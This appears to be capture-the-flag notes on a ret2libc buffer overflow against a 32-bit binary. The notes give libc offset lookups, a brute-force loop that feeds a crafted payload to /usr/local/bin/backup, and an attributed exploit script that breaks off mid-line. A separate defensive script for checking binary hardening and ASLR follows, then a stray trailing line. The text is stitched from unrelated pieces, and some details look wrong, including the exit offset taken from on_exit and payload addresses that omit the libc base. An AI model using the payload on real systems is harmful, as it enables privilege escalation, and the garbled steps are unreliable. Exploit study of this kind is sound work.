Check if there is a buffer overflow vuln:

    ldd /usr/bin/filename | grep libc
    libc.so.6 => /lib32/libc.so.6 (0xf75df000)

Get the value of system:

    readelf -s /lib32/libc.so.6 | grep system
     245: 00110820    68 FUNC    svcerr_systemerr@@GLIBC_2.0
     627: 0003a940    55 FUNC    _libc_system@@GLIBC_PRIVATE
    1457: 0003a940    55 FUNC    system@@GLIBC_2.0

We need the value of system@@GLIBC_2.0: "0003a940".

Get the value of exit:

    readelf -s /lib32/libc.so.6 | grep exit
    2263: 0002e7d0    78 FUNC    on_exit@@GLIBC_2.0

Get the value of /bin/sh in libc:

    strings -a -t x /lib32/libc.so.6 | grep /bin/sh
    15900b /bin/sh

    while true; do /usr/local/bin/backup -i $(python -c 'print "A" * 512 + "\x40\xa9\x03\x00\xb0\xe7\x02\x00\x0b\x90\x15\x00"'); done

IPPSEC Buffer Overflow Exploit Code:

    from subprocess import call
    import struct

    libc_base_addr = 0xf75b000
    system_off = 0x0003a940  # system offset
    exit_off = 0x0002e7d0    # exit offset
    a
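The readelf and ldd steps above are really a triage of the target binary: a fixed libc base (as printed by ldd) and a binary with no stack protections are what make the hard-coded addresses in the payload work. The script below is an added example, not code from the page or from IppSec's exploit, that automates the defender's side of that triage: it parses readelf output and reports which mitigations (PIE, NX via GNU_STACK, a stack canary) are missing and which unbounded copy functions the binary imports. The readelf output embedded in the block is constructed sample text for an unhardened 32-bit binary; `collect_from_binary` assumes GNU binutils `readelf` is on PATH, and the `aslr_level` helper assumes a Linux `/proc`.

```python
import re
import subprocess

# Constructed sample outputs (not taken from the page) of readelf on a
# 32-bit binary built without hardening: non-PIE, executable stack, no canary.
SAMPLE_HEADER = """ELF Header:
  Class:                             ELF32
  Type:                              EXEC (Executable file)
  Machine:                           Intel 80386
"""

SAMPLE_PROGRAM_HEADERS = """Program Headers:
  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  LOAD           0x000000 0x08048000 0x08048000 0x00b14 0x00b14 R E 0x1000
  LOAD           0x000f08 0x08049f08 0x08049f08 0x00130 0x00138 RW  0x1000
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x10
"""

SAMPLE_DYNSYM = """Symbol table '.dynsym' contains 4 entries:
   Num:    Value  Size Type    Bind   Vis      Ndx Name
     0: 00000000     0 NOTYPE  LOCAL  DEFAULT  UND
     1: 00000000     0 FUNC    GLOBAL DEFAULT  UND strcpy@GLIBC_2.0 (2)
     2: 00000000     0 FUNC    GLOBAL DEFAULT  UND printf@GLIBC_2.0 (2)
     3: 00000000     0 FUNC    GLOBAL DEFAULT  UND __libc_start_main@GLIBC_2.0 (2)
"""

# libc imports that copy caller-supplied data with no length bound.
UNBOUNDED_COPY_FUNCS = {"strcpy", "strcat", "gets", "sprintf", "vsprintf", "scanf"}


def is_pie(header_text):
    """True when `readelf -h` reports Type DYN (position-independent executable)."""
    m = re.search(r"^\s*Type:\s+(\w+)", header_text, re.M)
    return bool(m) and m.group(1) == "DYN"


def nx_enabled(phdr_text):
    """True when a GNU_STACK program header exists and lacks the E (execute) flag."""
    for line in phdr_text.splitlines():
        tokens = line.split()
        if tokens and tokens[0] == "GNU_STACK":
            # Columns: Type, Offset, VirtAddr, PhysAddr, FileSiz, MemSiz, Flg..., Align.
            # Flags may be split by spaces ("R E"), so join everything before Align.
            flags = "".join(tokens[6:-1])
            return "E" not in flags
    return False  # no GNU_STACK header: treat the stack as executable


def has_stack_protector(dynsym_text):
    """A canary-instrumented binary imports __stack_chk_fail from libc."""
    return "__stack_chk_fail" in dynsym_text


def unbounded_imports(dynsym_text):
    """Names of undefined (imported) symbols that are known unbounded copy functions."""
    found = []
    for line in dynsym_text.splitlines():
        tokens = line.split()
        if len(tokens) >= 8 and tokens[6] == "UND":
            name = tokens[7].split("@")[0]  # strip the @GLIBC_x.y version suffix
            if name in UNBOUNDED_COPY_FUNCS:
                found.append(name)
    return found


def assess(header_text, phdr_text, dynsym_text):
    """Summarise present/missing mitigations and risky imports as a dict."""
    report = {
        "pie": is_pie(header_text),
        "nx": nx_enabled(phdr_text),
        "canary": has_stack_protector(dynsym_text),
        "unbounded_imports": unbounded_imports(dynsym_text),
    }
    report["hardening_gaps"] = [k for k in ("pie", "nx", "canary") if not report[k]]
    return report


def collect_from_binary(path):
    """Run readelf (GNU binutils) on a real file and assess it. Assumed available on PATH."""
    run = lambda *flags: subprocess.run(["readelf", *flags, path],
                                        capture_output=True, text=True, check=True).stdout
    return assess(run("-h"), run("-l"), run("-s"))


def aslr_level():
    """Linux ASLR setting (0 off, 1 on, 2 on incl. brk); None when /proc is absent."""
    try:
        with open("/proc/sys/kernel/randomize_va_space") as f:
            return int(f.read().strip())
    except OSError:
        return None


if __name__ == "__main__":
    print(assess(SAMPLE_HEADER, SAMPLE_PROGRAM_HEADERS, SAMPLE_DYNSYM))
    print("ASLR level on this host:", aslr_level())
```

On the constructed sample the report lists all three mitigations as gaps and flags the `strcpy` import; a binary where `nx_enabled` and `has_stack_protector` both return True would not be reachable by a plain stack smash of the kind the page describes, and a host with `aslr_level()` of 2 invalidates any libc address computed from one ldd run.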
Way to Divergence